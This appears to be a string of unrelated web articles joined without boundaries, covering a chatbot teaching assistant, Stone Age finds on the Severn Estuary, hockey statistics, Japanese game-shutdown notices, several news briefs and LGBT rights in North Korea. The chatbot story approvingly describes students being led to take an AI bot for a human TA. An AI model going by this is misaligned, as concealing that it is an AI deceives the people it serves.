Here 's a sample interaction between the chatbot and a student . ( Courtesy Ashok Goel )
To help with his class this spring , a Georgia Tech professor hired Jill Watson , a teaching assistant unlike any other in the world . Throughout the semester , she answered questions online for students , relieving the professor 's overworked teaching staff .
But , in fact , Jill Watson was an artificial intelligence bot .
Ashok Goel , a computer science professor , did not reveal Watson 's true identity to students until after they 'd turned in their final exams .
Students were amazed . “ I feel like I am part of history because of Jill and this class ! ” wrote one in the class 's online forum . “ Just when I wanted to nominate Jill Watson as an outstanding TA in the CIOS survey ! ” said another .
Now Goel is forming a business to bring the chatbot to the wider world of education . While he does n't foresee the chatbot replacing teaching assistants or professors , he expects the chatbot 's question-answering abilities to be an invaluable asset for massive online open courses , where students often drop out and generally do n't receive the chance to engage with a human instructor . With more human-like interaction , Goel expects online learning could become more appealing to students and lead to better educational outcomes .
“ To me this is a grand challenge , ” Goel said . “ Education is such a huge priority for the entire human race . ”
At the start of this semester Goel provided his students with a list of nine teaching assistants , including Jill , the automated question and answering service Goel developed with the help of some of his students and IBM .
Goel and his teaching assistants receive more than 10,000 questions a semester from students on the course 's online forum . Sometimes the same questions are asked again and again . Last spring he began to wonder if he could automate the burden of answering so many repetitive questions .
As Goel looked for a technology that could help , he settled on IBM Watson , which he had used for several other projects . Watson , an artificial intelligence system , was designed to answer questions , so it seemed like a strong fit .
To train the system to answer questions correctly , Goel fed it forum posts from the class 's previous semesters . This gave Jill an extensive background in common questions and how they should be answered .
Goel tested the system privately for months , having his teaching assistants examine whether Jill 's answers were correct . Initially the system struggled with similar questions such as “ Where can I find assignment two ? ” and “ When is assignment two due ? ” Goel tweaked the software , adding more layers of decision-making to it . Eventually Jill reached the point where its answers were good enough .
“ I can not create chaos in my classroom . Jill had to be almost perfect as a human TA or I am , ” Goel said .
The system is only allowed to answer questions if it calculates that it is 97 percent or more confident in its answer . Goel found that was the threshold at which he could guarantee the system was accurate .
There are many questions Jill ca n't handle . Those questions were reserved for human teaching assistants .
Goel plans to use Jill again in a class this fall , but will likely change its name so students have the challenge of guessing which teaching assistant is n't human .
“ A really fun thing in this class has been once students knew about Jill they were so motivated , so engaged . I 've never seen this kind of motivation and engagement , ” Goel said . “ What a beautiful way of teaching artificial intelligence . ”
Extraordinary evidence showing that Stone Age people were more than just hunters has been found at a threatened archaeological site on the Severn Estuary .
Researchers from the University of Reading found 7500 year-old worked flint ‘ tools ' , bones , charcoal and hazelnut shells while working at Goldcliff , near Newport , in September .
These finds indicate that Mesolithic people were manipulating the environment to increase their resources , thousands of years before farming began . Charcoal remains suggest these people used fire to encourage the growth of plants , such as hazelnuts , crab apples and raspberries . The researchers believe all these were eaten .
Most of the evidence in Britain for hunter-gatherer relates to the hunting of animals as bones survive on more sites , so the plant part of their diet tends to be ignored . The Severn Estuary sites however are exceptional in providing evidence for a wide range of plant resources .
Professor Martin Bell , Head of the University of Reading 's Department of Archaeology , is leading the Severn Estuary project . He said : `` Previously it was thought that these people were mainly hunting deer and simply responding to the spectacular environmental changes around them , such as sea level rise . Now there is increasing evidence that they were adept at manipulating their environment to increase valued plant resources .
`` Combining our finds with the trees , pollen and insects from the area we can build a picture of the environmental relationships of Mesolithic hunter-gatherers . These people were highly adaptable and continued using the same site as the environment changed dramatically from old woodland to reedswamp , to saltmarsh and back to fen woodland . ''
Over the last two summers researchers from the University of Reading have found Stone Age footprints at Goldcliff and new archaeological finds , including footprints of animals and birds , are constantly being made in the Severn Estuary .
Professor Bell continued said : `` The 7500 year old footprint trails show how the activity areas represented by flint tools and bones articulated together as parts of a living stone age landscape . The footprints include those made by children , which is extremely exciting as the role of children tends not to be visible in the archaeological record . They show youngsters as young as four were actively engaged in the productive activities of the community . ''
The House of Commons Select Committee on Climate Change is once again considering a Severn Tidal Barrage . This scheme would have a major impact on the rich archaeological resource of the Severn Estuary which is giving archaeologists an unparalleled glimpse into the life of a Stone Age settlement .
`` From an archaeological point of view construction of a Severn Tidal Barrage would have very serious consequences alongside the more widely recognised ecological risks to fish , birds and many other organisms , '' continued Professor Bell . `` The tidal range will be reduced , sites will be permanently submerged , sedimentation will increase in some areas and , as patterns of erosion change , some site , including those with exceptional preservation of organic artefacts , may be rapidly destroyed .
The Severn Estuary project is featured in the December issue of National Geographic .
ENDS
For all media enquiries please contact James Barr , University of Reading Press Officer on 0118 378 7115 or by email on j.w.barr @ reading.ac.uk
Follow us on Twitter | Like us on Facebook | Read our research blog 'The Forum '
Notes for Editors
The University of Reading is ranked among the top 1 % of universities in the world ( THE World University Rankings 2012 ) and is one of the UK 's top research-intensive universities .
The bass contortionists unite for an “ A/V tour . ”
Sepalcure , the duo of Praveen Sharma and Machinedrum , will team up with the Wedidit collective 's resident chop-and-screw expert Shlohmo for a brief US tour this December .
According to Resident Advisor , New York artist Sougwen Chung will provide the visual aid to Sepalcure 's set ; she has illustrated all of their releases . Details of Shlohmo 's A/V component have n't been released , but the three dates are below .
The three have been busy as of late . Praveen recently released the “ unashamedly emotive and melancholic ” 12 Lights LP ; the debut from Machinedrum 's other duo , JETS , came out today ; and for his part , Shlohmo has been churning out slowed-and-throwed remixes all year .
Dec 27 – The Independent – San Francisco , California
Dec 28 – Bottom Lounge – Chicago , Illinois
Dec 29 – The Sinclair – Cambridge , Massachusetts
Addressing Iran-Russia Business Forum in Tehran , the Russian official referred to inking of investment deals between economy ministries of the two countries saying “ tariffs on certain export commodities have been cut down and a customs green corridor has been launched . ”
He further pointed to the accord on facilitating visa issuance between the two sides asserting that both sides sought to resolve legal and banking issues as a means of boosting bilateral trade ties .
On replacement of dollar with national currencies of Iran and Russia , Novak said central banks and monetary institutions of the two countries have paved the path in this regard and money transfer is being performed .
Russian energy minister recalled that 10 major banks of Iran and Russia had embarked on the project as well as that a team was put in charge of tackling existing banking difficulties .
He further maintained that Memoranda of Understanding ( MoUs ) on large-scale projects were inked last year details of which are being discussed ; “ economy ministers of both countries are also planning to allocate a 2.5-billion-dollar credit to proposals . ”
The visiting official said one contract pertained to construction of Boushehr Power Plant and electrification of Iranian railways ; “ negotiations are also underway on sales of Sukhoi Superjet 100 ( SSJ100 ) aircraft to Iran . ”
The Russian energy minister , while pointing to age-old energy ties between Tehran and Moscow over construction of power and nuclear plant , said companies of both sides have also agreed on development of oil and gas field following the removal of international sanctions .
He expressed hope that recent measures would trigger further economic activities concluding that the talks also dealt with inking a free trade agreement with Eurasian Economic Union for which necessary steps have been taken and a free trade zone will be created .
HA/3849663
If you had n't watched a single Canucks game in 2013 and only looked at the numbers , Jordan Schroeder 's rookie season would n't jump out at you . The diminutive center has two goals and five points in 17 games ( roughly a 25 point pace over a full 82 game season ) . He has seen some time on the power play ( and he will likely return to the top unit now that Ryan Kesler is out with a broken foot ) , but his numbers are n't really all that impressive .
So why are some people ( myself included ) so bullish on Schroeder and his NHL upside ?
For a lot of reasons , and they do n't include his goal or assist totals . Do n't get me wrong , goals are crucial to winning hockey games ( unfortunately the NHL does n't give out wins to the team with the best Corsi rating – yet ) , but goals are n't always the best indicator of how a player is performing . Schroeder has proven that he belongs in the NHL for his overall play .
Going into this season , a lot of people figured Schroeder would be used as trade bait . After all , how would he fit in with the Canucks ? Schroeder is n't a winger , and Alain Vigneault did n't seem like a coach who would be willing to give third line minutes to an undersized rookie . However , Schroeder has impressed his coach with his attention to detail defensively , his aggressiveness in pursuing the puck , and his ability to make plays in traffic against much bigger and much stronger players .
I liken Schroeder 's success to that of Russell Wilson , the quarterback/messiah for the Seattle Seahawks . Wilson slid to the third round at the 2012 NFL Draft because of a lack of height . Many scouts went on record saying that he would have been a sure-fire top 10 pick if he were three or four inches taller . Wilson has succeeded because of his athletic ability , self-confidence , and incredible leadership and poise at a young age . He has also excelled because he understands his height limitations .
The argument that a player is too small to play is faulty to a degree – obviously height and size are important in contact sports , but it is n't like you are taking a 6-6 person and shrinking them down . Wilson ( and Schroeder ) have been short their entire lives . They know how to make plays against taller and bigger players . They have learned how to use their lack of height as an advantage – in Schroeder 's case he has a low center of gravity which allows him to maintain puck possession . In Wilson 's case , he has a compact frame and uses that to elude would-be tacklers .
Schroeder , in particular , is very strong for a small forward , a sentiment that was echoed by his former strength coach at Minnesota ( Cal Dietz ) as well as his offseason trainer ( Kirk Olson ) .
Dietz on Schroeder arriving at Minnesota as a freshman :
When he came in , he was developed . He matured pretty early – he was really physically developed . We did some pretty awesome things with him . He 's a tough kid with a low center of gravity . He plays hard .
Schroeder has continued to look good in the NHL , averaging 14:04 of ice time per game . His production has n't really cooled off ( to be fair , it never really heated up ) , and he continues to drive possession forward with linemates David Booth and Mason Raymond . Relative to most NHL forwards , Schroeder 's role is sheltered , but that is more so due to how to Alain Vigneault employs his centers and manages the matchups his young players face . Schroeder is starting 59.2 % of his shifts in the offensive zone ( Henrik Sedin is ahead with a 69.2 zone start rate ) , and his 5.9 Corsi Relative rating is among the best on the team . As an offensive center , he does n't see a ton of defensive responsibilities ( at least to start a shift ) .
If you want an example of sheltering a player , look at how the Canucks used Cody Hodgson in 2011-12 ( and January 2012 to be exact ) .
Advanced statistics via behindthenet.ca indicate Gillis ' comment here is not a smoke screen . In January , Hodgson scored 10 points in 11 games while starting in the offensive zone 83.3 percent of the time . If he had maintained that O-zone start percentage , it would have been the highest in the NHL .
When his O-zone start was 52 percent in October , Hodgson scored three points in 11 games and in November , when his starts were 40 percent he scored eight in 13 games . In December , his O-zone faceoffs dropped to 33 percent . He scored nine points in 15 games . In February , Hodgson 's O-zone starts decreased to 63.3 percent and he only scored three points in 13 games . Yes , it is a small sample size , but when Hodgson was n't playing on the offensive side as often while in Vancouver , he scored 23 points in 52 games or 0.44 points per game . When he started 83.3 percent of the time in the offensive zone , he scored 0.91 points per game .
What does this all mean in terms of offensive upside , though ? Schroeder , asides from a huge freshman year at Minnesota , has never been a scoring star at either the NCAA or AHL levels . He has been very good for the United States at the World Juniors ( he is the all-time points leader with 27 career points at three World Juniors ) .
There are reasons to believe that Schroeder has more to give offensively . For one , his PDO in 2013 is a team-low 958 .
A quick refresher :
PDO is the sum of `` On-Ice Shooting Percentage '' and `` On-Ice Save Percentage '' while a player was on the ice . It regresses very heavily to the mean in the long-run : a team or player well above 100 has generally enjoyed good luck and should expect their `` PDO '' number to drop going forward – and vice-versa for players below 100 .
Additionally , whenever Schroeder is on the ice , the Canucks are scoring on only 5.56 % of their shots . That number should be expected to increase as the season continues on ( the average for NHL players tends to be between 7 and 8.5 % , depending on linemate quality and how good the player is ) . So not only is Schroeder not shooting the puck much , but his line is n't getting any `` puck luck '' either .
Stats , as always , only tell a part of the story . What Schroeder has shown in his rookie season is an ability to make the right play the majority of the time . There is n't any panic in his game . The one number that really jumps out at me is 20 . In 17 games , Schroeder only has 20 shots on goal . He is more playmaker than scorer , but he simply needs to shoot the puck more .
Will Schroeder be a 60+ point player at the NHL level ? Probably not . His production at lower levels does n't indicate that kind of upside . But it does n't rule it out , either . Schroeder has always been a player who excels with more talented linemates ( to be fair , this could be said about any athlete in any sport ) . To expand on that further – Schroeder has terrific vision and plays a smart game positionally , and those attributes are best utilized when he is put with talented wingers . For example , he and Mason Raymond have been great together this year , and Raymond is another really smart hockey player ( and he looks significantly stronger on his skates this year than last too ) .
What is Schroeder 's offensive upside ? I 'm not really sure yet , but he has laid the foundation for more offensive production with his defensive play . Vigneault rewards quality two-way players with ice time , and Schroeder 's steady defensive play bodes well for him . Once he gets more confident offensively and starts firing pucks on goal at a higher rate , expect his production to increase accordingly . And he has a significant opportunity ahead of him with Kesler out for the foreseeable future .
2018.03.30
「エースコンバット インフィニティ」サービス終了時間のお知らせ パイロット各位 これまでプレイしていただき、ありがとうございました。 以下の日時をもって本サービスは終了させていただきます。 【本サービスの終了日時】 2018/03/31 17:00 ( 東京時間 )
2018/03/31 08:00 ( ロンドン時間 )
2018/03/31 00:00 ( ロサンゼルス時間 ) ※サービス終了後は、お遊びいただくことができなくなります。
※上記日時は、お遊びの地域によって前後する可能性がございます。 エースコンバット インフィニティは皆様の熱いご支援、ご声援のおかげで、約4年もの間サービスを行うことができました。
またその結果、数多くの機体の実装、SOLGやエクスキャリバーのHD化、新しい対戦モードの開発など、
サービス開始時には全く計画していなかった多くのことを実現することができました。
プレイヤーの皆様と開発運営チームという違いこそありますが、皆様と一緒に創り進めてこられたことを、嬉しく思います。 全てのパイロットにありがとうを。
最後までこの空を愛していただいた皆様に心から感謝を申し上げます。
そして、また次の空でお会いしましょう！ -エースコンバット インフィニティ 運営チーム一同-
2018.03.15
「エースコンバット インフィニティ」サービス終了日時のお知らせ パイロット各位 いつもプレイしていただき、ありがとうございます。
本サービスの終了が近づいてまいりましたので、あらためてメッセージをお送りさせていただきます。 【本サービスの終了日時】 2018/03/31 17:00 ( 東京時間 )
2018/03/31 08:00 ( ロンドン時間 )
2018/03/31 00:00 ( ロサンゼルス時間 ) ※サービス終了後は、お遊びいただくことができなくなります。
※上記日時は、お遊びの地域によって前後する可能性がございます。 サービス終了まで残り少ない時間ですが、
皆様が愛して下さったこの空を心ゆくまで飛んでいただけますと幸いです！ -エースコンバット インフィニティ 運営チーム一同-
2018.02.28
御礼のごあいさつ パイロット各位 いつも「エースコンバット インフィニティ」をプレイいただきありがとうございます。 早いもので本サービスの終了まで、残すところ1か月となりました。 エースコンバットの歴史の中で、オンライン専用という従来にない立ち位置でインフィニティは生まれました。
今作で初めてエースコンバットをプレイされた新米パイロットの方々や、歴代作品をプレイしていたベテランパイロットの方々、インフィニティがここまで育つことができましたのは、皆様のお声とご支援のおかげです。
飛行機を、マルチプレイゲームを、エースコンバットを愛してくださる皆様に、お楽しみいただける空はお届けできたでしょうか。 僅かばかりではありますが、最後にインフィニティの特徴となる要素にちなんだチャレンジをご用意いたしました。
リーパーの活躍、数々の協同戦役ミッション、シリーズから生み出された先鋭的な架空機体の再現、黄色いアイツ…
ぜひ挑戦していただき、皆様のお心に残れば幸いです。 また、最後までプレイしてくださった皆様へのお礼として、殊勲飛行メダルをゲーム内のおしらせにてお贈りいたします。
長きにわたりエースコンバット インフィニティを御愛顧いただき、誠にありがとうございました。
＜プレゼント内容＞
殊勲飛行メダル×30
-エースコンバット インフィニティ 運営チーム一同-
2018.02.01
エースコンバット インフィニティ 無料アイテムおよびゲーム本編等の配信終了のお知らせ パイロット各位 平素より「エースコンバット インフィニティ」をご利用いただきまして、誠にありがとうございます。
先般よりお知らせしておりますとおり、2018年3月31日をもちましてサービス終了となります。
サービス終了にともない、「エースコンバット インフィニティ」のゲーム本編を含む、以下のダウンロードコンテンツを、2018年3月1日をもって配信終了させていただきます。 配信終了となるコンテンツは以下のとおりです。 ◆配信終了コンテンツ ・無料アイテム
・プロダクトコードで入手するアイテム
・ゲーム本編 ◆配信終了日 ・2018年3月1日 ※ダウンロード済みのアイテムは、サービス終了までご利用いただけます。
※配信終了後は再ダウンロードも不可能となります。
※上記日程は予告なく変更となる場合がございます。また、実際の配信終了はお遊びの地域により、若干前後する可能性がございます。 ご愛顧いただきました皆様には、厚く御礼申し上げます。
その他続報がございましたら、ゲーム内の「お知らせ」、公式ホームページ等で告知いたします。 ‐エースコンバット インフィニティ 運営チーム一同
2018.01.01
2018年あけましておめでとうございます パイロット各位 新年あけましておめでとうございます。
パイロットの皆様のおかげで、なんと4回目のお正月を迎えることができました。 昨年はとうとうサービス終了のアナウンスをさせていただくことになってしまいましたが、
プロジェクトACESはこれからもエースコンバットシリーズを制作してまいります。
今後も変わらぬご愛顧をよろしくお願いいたします。 サービス開始時にはすぐに終わってしまうのではないかと不安でいっぱいで、
悔いが残らないよう全力でやろう、と日々思いながら運営を続けてまいりました。
皆さまにご迷惑もいっぱいかけてきましたが、温かく見守ってもらえたこと、
本当に嬉しかったです。 幸いにも皆さまのご支持をうけ、1周年、2周年、なんと3周年を迎えることができました。 パイロットの皆さまと一緒にサービスを築き上げてきたエースコンバット
インフィニティですが、この良い時間、この良い体験をプロジェクトACES一同
心に刻みつつ、一旦、幕引きとさせていただきます。 エースコンバット７も鋭意開発中ですので、こちらの応援もよろしくお願いいたします。 こんなに長期にわたり楽しんでいただき、本当にありがとうございます。
残り期間も限られてしまいましたが、引き続き、楽しんでいただけると幸いです。 本年もよろしくお願いいたします。 ※日頃プレイしてくださる皆様に感謝の意を込め、
以下のアイテムをプレゼントさせていただきます。 ゲーム内のお知らせよりお受け取りください。 ＜プレゼント内容＞
備蓄燃料×10
エリート傭兵契約×4
プラント追加投資契約×4 ‐エースコンバット インフィニティ 運営チーム一同
2017.12.20
「機体を成長させようキャンペーン！」のご紹介 期間中は研究ゲージの伸び率が２倍！
また、300万、200万、100万クレジットのドロップも同時に開催しております。 機体ツリーを伸ばすもよし、愛機をさらに鍛えるもよし。
この機会にドンドン成長させましょう。 【開催期間】 2017年12月20日 17:00頃 ～ 2018年1月1日 17:00頃
2017.12.20
艦隊攻略戦ランキング『ニューコム杯』を紹介 期間限定！艦隊攻略戦ランキングイベント ” ニューコム杯 ” を開催いたします！ 戦況を読み解き、チームを勝利に導け！ 【開催期間】 2017年12月20日 13：00頃 ～ 2017年12月26日 17：00頃 【参加条件】 期間中に艦隊攻略戦に出撃したプレイヤー全員 【内容詳細】 ◆報酬について ・ランキング上位者には順位に応じて下記のアイテムが配布されます。 ○限定エンブレム：『ニューコム杯』 ○殊勲飛行メダル ○限定通り名：『ニューコム杯の死神』『ニューコム杯』 ○特別機体オーバーチューンの依頼書 ○研究レポート ○クレジット ■キリ番（※）報酬①：限定エンブレム：『ニューコム杯』
※ 210、220、230、240、250、260、270、280、290、300、400、500、600、700、765、800、900、
1000、2000、3000、4000、5000、6000、7000、7650、8000、9000、10000位 ■キリ番（※）報酬②：特別機体オーバーチューンの依頼書 ※ 1765、2765、3765、4765、5765、6765、7765、8765、9765、10765位 ◆チームデスマッチ（艦隊攻略戦）について ○チームデスマッチ（艦隊攻略戦）とは ２チームに分かれて敵チームと対戦を行い、敵チームの艦隊へより多くのダメージを与えることを目指します。 ○勝利条件 ・敵チームの艦隊の艦船へダメージを与えることで敵艦隊のHPを減らすことができます。
・制限時間が０になるか、どちらかのチームの艦隊が全滅すると決着となります。
・制限時間内でより多くのダメージを艦隊に与えたチーム、又は敵艦隊を全滅したチームが勝利となります。
・制限時間が０になって艦隊へ与えたダメージがお互い同じ場合には引き分けとなります。
・敵の戦闘機を一定数撃墜することで敵艦隊へ「STRATEGIC ATTACK」と呼ばれる味方の追加攻撃が発動します。 ○リスポーン ・チームデスマッチでは、撃墜された後のリスポーンが強制で行われます。
・リスポーンした直後、一定時間は無敵となり相手のＨＵＤにコンテナが表示されません。
・一定時間の経過、もしくは攻撃操作を行うことでその状態が解除されます。 ○マッチングレート ・マッチングレートはオンライン協同戦役のものとは別にチームデスマッチ専用のものが用意されます。
・マッチングレートは獲得スコアなどから測られ、実力の近いプレイヤー同士が組めるように調整するものです。 ◆ランキングについて ・ランキングはイベント開催期間のチームデスマッチの成績をもとにした「ランキングpt.」の合計で競います。
・「ランキングpt.」はチームデスマッチに出撃し、そのミッションが終了した後に算出・加算されます。
・「ランキングpt.」はその出撃において獲得した個人スコアと撃墜・墜落回数をもとに算出されます。
・「ランキングpt.」は強行出撃の影響を受け、出撃燃料の消費個数に応じて算出値が上昇します。
・集計は期間終了後に行いますので、報酬は集計完了後に付与いたします。
・ランキングの反映には時間がかかります。そのため、ランキング終了時点で表示されている順位と
実際の順位が異なる場合がございますので、予めご了承下さい。
・ランキング報酬はイベント終了日の翌日9:00頃に配布する予定です。 ◆その他の注意事項 ・イベント終了時刻にリザルトの確定していないスコアは、ランキングに反映されません。
・集計時に複数のプレイヤーの「ランキングpt.」の合計値が同じであった場合は、
同pt.に到達した時刻の早い順で順位が決まります（同着はありません）。
・イベント終了後は「ランキングpt.」の付与は行われません。
また、次のイベントへの「ランキングpt.」の引き継ぎはありません。
・出撃後、サーバーとの通信環境によってはランキング情報の登録が行えない場合がございます。予めご了承下さい。
・本イベントは予告なく変更や終了になる場合がございます。
また、本イベントの開催期間や時間は前後する場合がございます。
・不正な行為を行なった場合、本タイトルのオンライン規約に基づいて適切な処置を実施させていただくこともございます。
2017.12.16
協同戦役ランキング『九尾戦役』を紹介 12月後半の協同戦役ランキング ” 九尾戦役 ” を開催いたします！ 【開催期間】 2017年12月16日 13：00頃 ～ 2017年12月31日 17：00頃 【参加条件】 期間中に協同戦役に出撃したプレイヤー全員 【内容詳細】 ◆報酬について ・ランキング上位者には順位に応じて下記のアイテムが配布されます。 ○限定エンブレム：『九尾戦役』 ○殊勲飛行メダル ○限定通り名：『九尾戦役の亡霊』『九尾戦役』 ○特別機体オーバーチューンの依頼書 ○研究レポート ○クレジット ■キリ番（※）報酬①：限定エンブレム：『九尾戦役』 ※ 210、220、230、240、250、260、270、280、290、300、400、500、600、700、765、800、900、
1000、2000、3000、4000、5000、6000、7000、7650、8000、9000、10000位 ■キリ番（※）報酬②：特別機体オーバーチューンの依頼書 ※ 1765、2765、3765、4765、5765、6765、7765、8765、9765、10765位 ◆ランキングについて ・ランキングはイベント開催期間のオンライン協同戦役の成績をもとにした「ランキングpt.」の合計で競います。
・「ランキングpt.」はオンライン協同戦役に出撃し、そのミッションをクリアした後に算出・加算されます。
・「ランキングpt.」はその出撃において獲得したクリアランクと個人スコアの結果をもとに算出されます。
・「ランキングpt.」は強行出撃の影響を受け、出撃燃料の消費個数に応じて算出値が上昇します。
・ランキングの反映には時間がかかります。そのため、ランキング終了時点で表示されている順位と
実際の順位が異なる場合がございますので、予めご了承下さい。
・イベント終了時刻にリザルトの確定していないスコアは、ランキングに反映されません。
・ランキング報酬はイベント終了日の翌日9:00に配布を予定しております。 ◆その他の注意事項 ・集計時に複数のプレイヤーの「ランキングpt.」の合計値が同じであった場合は、
同pt.に到達した時刻の早い順で順位が決まります（同着はありません）。
・イベント終了後は「ランキングpt.」の付与は行われません。
また、次のイベントへの「ランキングpt.」の引き継ぎはありません。
・出撃後、サーバーとの通信環境によってはランキング情報の登録が行えない場合がございます。ご了承下さい。
・本イベントは予告なく変更や終了になる場合がございます。
また、本イベントの開催期間や時間は前後する場合がございます。
・不正な行為を行なった場合、本タイトルのオンライン規約に基づいて適切な処置を実施させていただくこともございます。
2017.12.08
エースコンバット インフィニティ サービス終了・アイテム販売終了時期のお知らせ パイロット各位 平素より「エースコンバット インフィニティ」をご利用いただきまして、誠にありがとうございます。
サービス開始以来、多くの皆様にご利用いただきました「エースコンバット インフィニティ」ですが、誠に残念ながら2018年3月31日をもちまして、サービスを終了させていただくこととなりました。
ご愛顧いただきました皆様には、厚く御礼申し上げます。
アイテム販売等の終了に関するスケジュールは、下記の通りとなります。 ◆有料アイテムの販売終了 2018年1月9日 ※購入済みのアイテムは、サービス終了までご利用いただけます。
※ご購入されたアイテムは、使用の有無に関わらず返金などの対応はできません。予めご了承下さい。
※実際の販売停止日時に関しては、お遊びになっている地域により、若干前後する可能性がございます。 ◆無料アイテム、プロダクトコード商品、ゲーム本編の新規ダウンロードの終了 2018年3月1日 ※購入済みのアイテムは、サービス終了までご利用いただけます。
※実際の販売停止日時に関しては、お遊びになっている地域により、若干前後する可能性がございます。 ◆アップデートパッチ配信終了、サービス終了 2018年3月31日 ※サービス終了時間以降、本製品をお遊びいただくことができなくなります。
※上記日時は予告なく変更となる場合がございます。
※実際のサービス終了日時に関しては、お遊びになっている地域により、若干前後する可能性がございます。 その他続報がございましたら、ゲーム内の「お知らせ」、公式ホームページ等で告知いたします。 ‐エースコンバット インフィニティ 運営チーム一同
2017.12.08
Three graduates filed suit on Wednesday in U.S. District Court in New York .
RICHMOND , Va. ( AP ) — Court documents show that three University of Virginia graduates and members of a fraternity profiled in a debunked account of a gang rape in a retracted Rolling Stone magazine story are suing the publication and the article 's author .
The three graduates filed suit on Wednesday in U.S. District Court in New York . They are also suing Rolling Stone 's publisher , Wenner Media .
A lawyer for the men said they suffered `` vicious and hurtful attacks '' because of the inaccuracies in the November 2014 article , which was written by journalist Sabrina Rubin Erdely .
A top UVA official , who deals with sexual assaults at the Charlottesville school , is also suing the school .
Rolling Stone and the author could n't immediately be reached for comment on Wednesday .
PORTLAND , Maine — A series of real estate transactions that have the potential to transform Portland 's waterfront closed this week .
The Portland Co. 's complex at 58 Fore St. was sold on Monday to a group of developers , according to Tony McDonald , the broker with CBRE/The Boulos Co. who closed the deal . McDonald represented the property 's former owner , Phineas Sprague .
He would n't discuss the identity of the buyers or a purchase price , citing a desire on the part of Sprague and the buyers to craft a press release to be released Monday .
The property , which has been on the market since 2008 , consists of several brick-red buildings that sit on approximately 10 acres at the foot of Munjoy Hill on Portland 's eastern waterfront . The Portland tax assessor 's office values the property and its buildings at $ 1.9 million .
The complex houses many businesses , including Portland Yacht Services , which is owned by Sprague ; New England Fiberglass ; and the Maine Narrow Gauge Railroad and Museum . It 's also home to several popular events , including the Portland Flower Show and Maine Boatbuilders Show , and is rented out for weddings and other gatherings .
As far as McDonald knows , the developers “ do n't have any specific immediate plans ” for the property , which got its start as a locomotive foundry in 1846 . However , the events will remain at the site , he said .
One of the reasons developers want to be careful in how they craft their message is that they do n't want people to think the property no longer will be available for events , McDonald said .
The complex of buildings is not on the National Register of Historic Places , “ but they are historic in the literal sense of the word if not legal , ” McDonald said . “ I do n't think anyone is planning to tear them all down . They 're too valuable and too charming . ”
After the sale of The Portland Co. complex , McDonald also represented Sprague in the purchase of 15 acres on the other side of Portland 's waterfront , just west of the Casco Bay Bridge and approximately across the street from where developer J.B. Brown & Sons hopes to construct three new office buildings .
“ The big picture on this whole thing is we 're selling Phin 's property to provide funding to build a new state-of-the-art small shipyard , ” McDonald said .
The shipyard will be built on the 15-acre lot Sprague purchased in two deals that also closed this week , he said . Sprague purchased one portion from Pan Am Railways in a deal that closed Wednesday , and the other portion from gas company Unitil , which closed Friday , McDonald said .
Christopher O'Neil , a Portland Community Chamber consultant , recently told the Bangor Daily News that Sprague 's sale of The Portland Co. complex and his new shipyard could spur as much as a billion dollars worth of waterfront development .
“ That will unleash a wave of positive development like we have n't seen since after the Great Fire of 1866 , ” O'Neil said .
Today , a new entry appeared in the popular benchmarking app  GeekBench . The name of the device in question is QUALCOMM BBF100-1 . As a reference , the BlackBerry Motion model number is BBD-100-X while the BlackBerry KEYone carried a model number of BBB100-X where X is a number depending on the region .
Given the timing of this report , we might be able to speculate that this is the successor to the BlackBerry KEYone . Last year , a prototype of the ( then called ) BlackBerry Mercury was shown off to the press , who received the device very well despite the fact that we were only shown the devices hardware .
Anyway , the unnamed BlackBerry device yielded pretty good scores with a Qualcomm Snapdragon 660 CPU paired with 6GB of RAM . This is all that was revealed by the newly uncovered GeekBench results . The BlackBerry KEYone did pretty well and we are very much looking forward to seeing how Blackberry and TCL will collaborate for the KEYtwo .
As per our previous report , last month - this unreleased BlackBerry will feature a display resolution of 1620 x 1080 px and will most definitely have a QWERTY keyboard .
Thanks for the tip !
Via ( Translated )
Lesbian , gay , bisexual , and transgender ( LGBT ) persons in North Korea face legal challenges not experienced by non-LGBT residents . Homosexuality and being openly transgender are not de jure illegal in North Korea , but the government does not support or allow other people in North Korea to support LGBT rights . [ citation needed ]
Criminal laws [ edit ]
Homosexuality and transgender issues are not formally addressed in the penal code . Criminal sanctions are sometimes levied against homosexuality or non-conforming gender expression deemed to be , `` against the socialist lifestyle . '' While punishment was rare , it has been reported by The Korea Times that North Korea has executed gay couples under this law . [ 2 ] [ not in citation given ]
2009 revisions of the national penal code may contain provisions that could potentially be used against LGBT people in a discriminatory manner , depending on interpretation .
Article 193 outlaws the creation , distribution or possession of `` decadent '' culture , where as Article 194 outlaws sexually explicit media as well as engaging in `` decadent '' behavior .
Article 262 bans men and women from engaging in `` obscene '' acts .
Constitutional law [ edit ]
The Constitution of North Korea , last revised in 2013 , does not explicitly address discrimination on the basis of sexual orientation or gender identity . The Constitution does broadly guarantee its citizens many civil , cultural , economic and political rights , including `` enjoy equal rights in all spheres of State and public activities '' . [ 3 ]
Family policy [ edit ]
Since the 1990s , the North Korean government has reportedly been willing to `` look the other way '' with regard to premarital sex and adultery , although this degree of social liberalism does not seem to apply to LGBT people . [ 4 ]
Media control and censorship [ edit ]
The state-controlled media in North Korea treats homosexuality as a vice or bad habit practised among foreign capitalists , especially Americans . [ citation needed ]
No positive depiction of LGBT people or endorsement of LGBT rights is permitted . Voice of America 's Korean Service has stated that any public discussion about homosexuality is highly taboo , if not illegal . [ 5 ]
Military [ edit ]
Military law mandates celibacy during the first 10 years of service for all enlistees . [ 1 ] Reportedly , male soldiers regularly break this rule , by engaging in casual heterosexual and homosexual affairs ; these homosexual relationships have been described as situational sexual behavior rather than a sexual orientation . [ 6 ]
Politics and propaganda [ edit ]
North Korea opposed both the UN declaration on sexual orientation and gender identity , which called for the worldwide decriminalization of homosexuality , and the exclusion of sexual orientation as discriminatory grounds for execution . [ citation needed ] Its precise reasons for doing so remain unclear .
North Korean propaganda , much like the state-controlled media , almost always depicts homosexuality as a characteristic of Western ( and particularly American ) morality . In the short story `` Snowstorm in Pyongyang '' ( 평양에서 눈보라 , published 2000 ) , captured crewmen of the USS Pueblo implore their North Korean captors to allow them to engage in gay sex . [ 7 ]
`` Captain , sir , homosexuality is how I fulfill myself as a person . Since it does no harm to your esteemed government or esteemed nation , it is unfair for Jonathan and me to be prevented from doing something that is part of our private life . ''
[ The North Korean soldier responds , ] `` This is the territory of our republic , where people enjoy lives befitting human beings . On this soil none of that sort of activity will be tolerated . '' — `` Snowstorm in Pyongyang '' , 2000
